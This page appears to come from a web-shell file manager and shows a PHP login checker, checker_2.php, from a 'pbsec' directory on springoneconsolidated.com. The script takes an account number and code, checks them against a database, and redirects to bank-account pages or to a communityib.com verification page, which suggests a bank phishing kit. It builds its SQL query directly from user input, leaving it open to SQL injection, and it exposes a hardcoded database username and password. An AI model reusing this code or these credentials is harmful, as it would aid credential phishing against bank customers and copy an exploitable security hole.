File manager - Edit - /home/justdoit/springoneconsolidated.com/pbsec/checker_2.php
Back
<?php $user_name=$_POST["account_number"]; $user_password=$_POST["code"]; $conn=mysqli_connect("localhost","shipdwbw_communityib","vbed1ePSb(h,","shipdwbw_communityib"); if(!$conn){ echo "can't connect now"; }else{ $SQL="SELECT * FROM activations WHERE account_number='$user_name' AND code='$user_password'; "; $result=mysqli_query($conn,$SQL); $row=mysqli_num_rows($result); if($row==1){ session_start(); $_SESSION["user_id"]=$user_name; header("Location:enrollment/home/account/bank/index.php"); }else{ header("Location:https://communityib.com/pbsec/verification.php"); } //close the connection mysqli_close($conn); } ?>
| ver. 1.4 |
Github
|
.
| PHP 7.0.33 | Generation time: 0.21 |
proxy
|
phpinfo
|
Settings